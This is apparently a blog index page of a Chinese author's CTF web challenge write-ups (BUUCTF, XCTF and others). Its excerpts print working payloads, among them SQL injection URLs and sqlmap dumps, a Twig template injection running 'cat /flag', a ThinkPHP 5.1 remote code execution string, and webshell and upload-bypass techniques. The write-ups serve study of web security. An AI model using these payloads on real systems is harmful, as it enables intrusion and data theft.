CTF刷题 WEB
Kal1
这个作者很懒,什么都没留下…
展开
-
2020程序员节首届哔哩哔哩安全挑战赛
第一题查看源码,定位对应元素,看到flag1的value第二题既然说了需要用bilibili Security Browser访问,那么我们改一下UA头这里我直接把这个浏览器加到了原来的ua头之后,试了好几次都不行后来才意识到要把其他都删掉这里我们用bp或者f12都可以改第三题纯属巧合,正经做法我还没想到name:adminpwd:bilibili第四题显示权限不足这里我们想到cookie查看了一下,发现有一个role看起来像md5我们解密一下发现是user那么原创 2020-10-25 19:30:22 · 627 阅读 · 2 评论 -
【SUCTF】web 2019 EasySQL 1(SQL堆叠注入+select 1 from的用法+sql_mode=PIPES_AS_CONCAT)
先观察页面,发现是post方法传参我们先提交一个数字发现会显示内容,但是输出字母却什么都不显示进行其他的一些操作也不管用查看wp发现是堆叠查询1;show databases; #查库1;show tables; #查表此处关键的代码查询就是select $post['query']||flag from Flag我们需要想办法让 || 不是逻辑或官方给的 payload 是1;set sql_mode=PIPES_AS_CONCAT;select 1拼接一下就是se原创 2020-10-14 21:50:58 · 303 阅读 · 0 评论 -
【BUUCTF】web sqli-labs 1(sql注入)
查询闭合http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0'查询数据库http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- a查询表名http://54250e原创 2020-10-12 20:24:28 · 1820 阅读 · 0 评论 -
【BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
<?php/** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */highlight_file(__FILE__);class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre原创 2020-10-12 19:48:35 · 3309 阅读 · 1 评论 -
[极客大挑战 2019]PHP(反序列化漏洞中存在private变量)
根据题目提示“我经常备份”,推测可能是网站备份在某个路径下使用dirmap扫描得到下载得到一个压缩包,里面是网站的源码里面的flag是假的我们分析index.php和class.phpindex.php里面的php代码<?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>这里是引用了class.php文件,用get方法传入一个sel原创 2020-10-06 12:48:45 · 2447 阅读 · 1 评论 -
[MRCTF2020]你传你呢 1 (文件上传漏洞,利用.htaccess文件绕过)
在buuctf的练习https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2预备知识:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowO原创 2020-10-05 16:18:08 · 1772 阅读 · 0 评论 -
BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie处注入)
既然提示了是和cookie有关系那么先看cookie没什么东西然后去flag界面查看一下发现多了一个user参数这里存在注入考虑可能是SSTI注入尝试一下123{{9+9}}确实可以存在twig模板注入payload{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}参考链接:https://www.k0rz3n.com/2018/11/12/%E4原创 2020-09-24 17:54:45 · 571 阅读 · 0 评论 -
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"原创 2020-09-23 21:29:33 · 1406 阅读 · 0 评论 -
2020-网鼎杯-朱雀组-Web-phpweb
打开题目,发现页面一直刷新(每5秒)使用bp拦截请求发现post了两条数据一个是func,一个是p猜测这个导致一直刷新查询后发现,这里可能用到了一个函数call_user_func(函数名,参数)使用这个函数查看一下源码func=file_get_contents&p=index.php得到了<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_so原创 2020-09-23 19:39:04 · 278 阅读 · 0 评论 -
【第五空间智能安全大赛】web hate-php
进入题目链接得到源码<?phperror_reporting(0);if(!isset($_GET['code'])){ highlight_file(__FILE__);}else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');原创 2020-09-13 21:15:31 · 710 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 ics-04
打开链接是一个网页,只有右上角的注册和登录可以打开这里登陆一下 使用sqlmap发现没有sql注入漏洞下面还有一个忘记密码,点进去看一看直接用sqlmap跑同样跑不出来结果这是想到会不会是post方式注入漏洞我们用bp获取一下发送的数据然后再用sqlmapsqlmap.py -r head.txt --dbs获取表名python sqlmap.py -r head.txt -D cetc004 --tables获取列名python sqlmap.py -r head.txt -D原创 2020-09-06 14:16:38 · 117 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 NaNNaNNaNNaN-Batman
下载附件 得到一个空白文件用十六进制编辑器打开是一个乱码的js文件仔细观察一下,发现下划线是一个变量并且在最后用eval输出虽然我还没学过js,但是我知道一个最出名的函数:alert函数可以把alert中的内容以弹窗形式输出我们在这里把eval函数改成alert然后把文件后缀改成html这时我们可以把后缀更改一下复制到vscode并且美化格式得到function $(){var e=document.getElementById("c").value;if(e.lengt原创 2020-09-03 21:49:18 · 281 阅读 · 1 评论 -
【XCTF 攻防世界】WEB 高手进阶区mfw
进入环境,看到about界面用到的技术git第一时间可以想到git泄露使用githack扫描一下python GitHack,py 网址/.git可以看到index.php和templates文件夹,templates文件夹是存放网页模板信息的都已经显示在网页中可惜flag.php没有内容查看index.php发现有猫腻<?phpif (isset($_GET['page'])) { $page = $_GET['page'];} else { $page = "ho原创 2020-09-03 17:48:37 · 344 阅读 · 0 评论 -
【2017-赛客夏令营】-Web-Uploadddd
打开链接是一个上传文件的界面先上传试试看看有没有限制发现php文件可以正常上传这时候就要找文件上传到了哪个漏洞使用dirmap工具python dirmap.py -i 你的网址 -lcf扫描得到了/.index.php.swp使用vim工具打开vim -r index.php.swp可以看到<?phpif (isset($_POST['submit'])){ $file_path = "uploads/"; $file_name = date("YmdHis原创 2020-09-01 19:19:00 · 424 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 shrine(ssti,待补充)
关于ssti的详解:(url先空着,正在写)打开页面就是一段源码,右键查看下源码import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')//注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号@app.route原创 2020-09-01 12:23:21 · 815 阅读 · 3 评论 -
【XCTF 攻防世界】WEB 高手进阶区 supersqli(三种方法)
这道题有多种方法方法一(堆叠注入+rename&alter)方法二(handler)方法三(预编译)方法一(堆叠注入+rename&alter)就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。相关知识补充:https://www.jianshu.com/p/c50ced83414dhttps://blog.cs原创 2020-08-27 18:14:19 · 649 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区PHP2
题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4820&page=1预备知识:1,什么是phps文件?phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类原创 2020-08-25 11:38:28 · 380 阅读 · 0 评论 -
【2020第四届“强网杯“全国网络安全挑战赛】强网先锋 Funhash
题目链接:http://39.101.177.96/<?phpinclude 'conn.php';highlight_file("index.php");//level 1if ($_GET["hash1"] != hash("md4", $_GET["hash1"])){ die('level 1 failed');}//level 2if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5(原创 2020-08-24 17:01:48 · 1161 阅读 · 0 评论 -
【第四届“强网杯”全国网络安全挑战赛】强网先锋 主动
题目链接:http://39.96.23.228:10002相关知识点:此处是命令注入传递?id=127.0.0.1;ls查看使用show-source(%27flag.php%27)不成功使用cat命令,echo都不行,可能是过滤掉了flag关键词和cat命令可以使用通配符通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查找文件夹时,可以使用它来代替一个或多个真正字符;当不知道真正字符或者懒得输入完整名字时,常常使用通配符代替一个或多个真正的字符。 实际上用“*原创 2020-08-24 10:56:57 · 277 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 Web_php_include
目录基础题解本题相关知识点:一题多解:**php文件包含****一句话木马****data://伪协议**data://伪协议+一句话木马基础题解<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?>上面这段原创 2020-08-23 16:10:03 · 1463 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 Web_php_unserialize
题目是一段php代码<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wake原创 2020-08-22 23:42:25 · 398 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 unserialize3
打开链接得到:题目提醒是反序列化漏洞这里有详细讲解反序列化漏洞:写一段代码执行<?phpclass xctf{ //类public $flag = '111';//public定义flag变量公开可见public function __wakeup(){exit('bad requests');}}//少了一个}$a=new xctf();echo(serialize($a));?>O:4:"xctf":1:{s:4:"flag";s:3:"111";}如果直原创 2020-08-22 18:37:48 · 307 阅读 · 1 评论 -
【百度杯”2017年春秋欢乐赛】web 攻击
题目链接:https://www.ichunqiu.com/battalion?t=1&r=57451分析代码:$_SEVER的解析:https://blog.csdn.net/weixin_45844670/article/details/108052294(1)若当前IP与$ ip变量的内容相同,则提示信息直接退出。(2)当POST中某id的键值等于’attack’时,打印$flag。这个id为 $flag的第6个位置开始,长度为3的一个字符串。(之所以是从第6个,是因为flag{已经原创 2020-08-17 14:18:58 · 444 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 高手进阶区 web2
题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5326&page=2打开场景,看到PHP代码下面还有贴心注释额,这题为啥不出在密码学里面。。。<?php$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";function encode($str){ $_o=st原创 2020-08-10 11:09:05 · 479 阅读 · 1 评论 -
【XCTF 攻防世界】WEB 高手进阶区 PHP_RCE
题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5412本题学到的:使用 https://www.exploit-db.com/ 这个网站查漏洞,看网站有无可乘之机。过程:根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1这里的payload:?s=/index/\think\app/invokefunction&function=call_us原创 2020-08-09 22:01:12 · 400 阅读 · 0 评论 -
【XCTF 攻防世界】WEB 新手练习区 webshell
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1首先,我们需要知道什么是webshellwebshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。Webshell可以上传到Web服务器,以允许远程访问Web服务器,例如Web服务器的文件系统。Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器原创 2020-08-09 21:19:35 · 772 阅读 · 0 评论